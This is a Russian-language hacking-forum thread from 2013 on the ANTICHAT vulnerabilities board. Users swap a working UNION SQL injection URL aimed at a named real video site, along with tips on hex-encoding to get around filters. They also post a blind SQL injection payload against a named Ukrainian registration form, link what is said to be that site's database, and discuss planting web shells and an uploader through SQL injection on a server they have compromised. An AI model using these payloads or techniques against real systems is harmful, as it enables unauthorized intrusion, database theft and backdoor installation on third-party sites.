HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 26.12.2013, 00:38
KolosJey
Новичок
Регистрация: 21.12.2009
Сообщений: 0
С нами: 8625634

Репутация: 0
По умолчанию

Вывод.

http://videos.webpronews.com/video/playlist.php?movie_name=ses_jcolborn' and 1=2 union select * from (select "ses_jcolborn' and 1=2 union select * from (select version())d join (select 2)e join (select 3)f join (select 4)g join (select 5)h--+")a join (select 2)b join (select 3)c limit 1--+

Если нужны запятые можно в хекс.

Цитата:
Сообщение от winstrool  
завтра если будет возможность еще покручу
что бы что то покрутить, нужно понимать хотя бы как оно работает

Цитата:
Сообщение от winstrool  
movie_name=
-
ses_jcolborn
что это за минус, чудо? )
 
Ответить с цитированием

  #2  
Старый 27.12.2013, 12:13
WallHack
Постоянный
Регистрация: 18.07.2013
Сообщений: 300
С нами: 6747446

Репутация: 32
По умолчанию

Сканировал сайт нашёл Blind SQL Injection

Сайт http://binker.org.ua/reg.html

Post запрос code=1&email=sample@email.tst&reg_referer=0&regnam e=-1' or 4 = '5

Можно ли её раскрутить ?
 
Ответить с цитированием

  #3  
Старый 27.12.2013, 14:42
er9j6@
Постоянный
Регистрация: 17.09.2011
Сообщений: 390
С нами: 7712246

Репутация: 23
По умолчанию

Цитата:
Сообщение от WallHack  
Сканировал сайт нашёл Blind SQL Injection
Сайт http://binker.org.ua/reg.html
Post запрос code=1&email=sample@email.tst&reg_referer=0&regnam e=-1' or 4 = '5
Можно ли её раскрутить ?
скорее всего стоит не Mysql, дальше не стал крутить
 
Ответить с цитированием

  #4  
Старый 27.12.2013, 16:03
WallHack
Постоянный
Регистрация: 18.07.2013
Сообщений: 300
С нами: 6747446

Репутация: 32
По умолчанию

Цитата:
Сообщение от None  
er9j6@
Вот база данный этого скрипта http://rghost.ru/51238267
 
Ответить с цитированием

  #5  
Старый 29.12.2013, 12:45
Grifon
Познающий
Регистрация: 20.03.2008
Сообщений: 47
С нами: 9548989

Репутация: 1
По умолчанию

Товарищи добрый день. Мне нужно протестировать пару сканеров. Не подскажите уязвимые сервисы для Винд Сервер 2003?
 
Ответить с цитированием

  #6  
Старый 29.12.2013, 17:27
imprenko
Новичок
Регистрация: 09.09.2010
Сообщений: 9
С нами: 8249366

Репутация: 0
По умолчанию

Приветствую всех.

есть скуль есть права могу читать и записывать файлы

но файлы php txt и т.д не создаются только html

можно создать:

1.php.html но он будит пуст

2.txt.html будит с кодом но с таким

3.html будит с кодом но с таким

почему то 2 раза записывается в файл

выполнение команд видимо не работает из за этого

позаливал кучу разных шеллов и все отображаются коряво php во всех не работают

залил аплоадер тоже с помощью него не заливают файлы никакие

подскажите как сделать правильно чтоб работали команды
 
Ответить с цитированием

  #7  
Старый 29.12.2013, 17:51
Massay
Новичок
Регистрация: 06.03.2013
Сообщений: 21
С нами: 6940406

Репутация: 0
По умолчанию

//del
 
Ответить с цитированием

  #8  
Старый 29.12.2013, 18:09
imprenko
Новичок
Регистрация: 09.09.2010
Сообщений: 9
С нами: 8249366

Репутация: 0
По умолчанию

Цитата:
Сообщение от OxoTnik  
Бекдор не работает потому что в формате html? а не потому что записывается несколько раз в файл
ага точно.

а что можно сделать ?
 
Ответить с цитированием

  #9  
Старый 29.12.2013, 18:34
imprenko
Новичок
Регистрация: 09.09.2010
Сообщений: 9
С нами: 8249366

Репутация: 0
По умолчанию

Цитата:
Сообщение от OxoTnik  
ну прочти конфиги БД и подключись к примеру
пароли знаю.

я насчет шелла возможно как нить залить через скулю?
 
Ответить с цитированием

  #10  
Старый 29.12.2013, 18:34
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами: 10992741

Репутация: 0
По умолчанию

Цитата:
Сообщение от Massay  
Помогите пожалуйста розкрутить sql инъекцию
С чего ты взял что там что-то есть?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.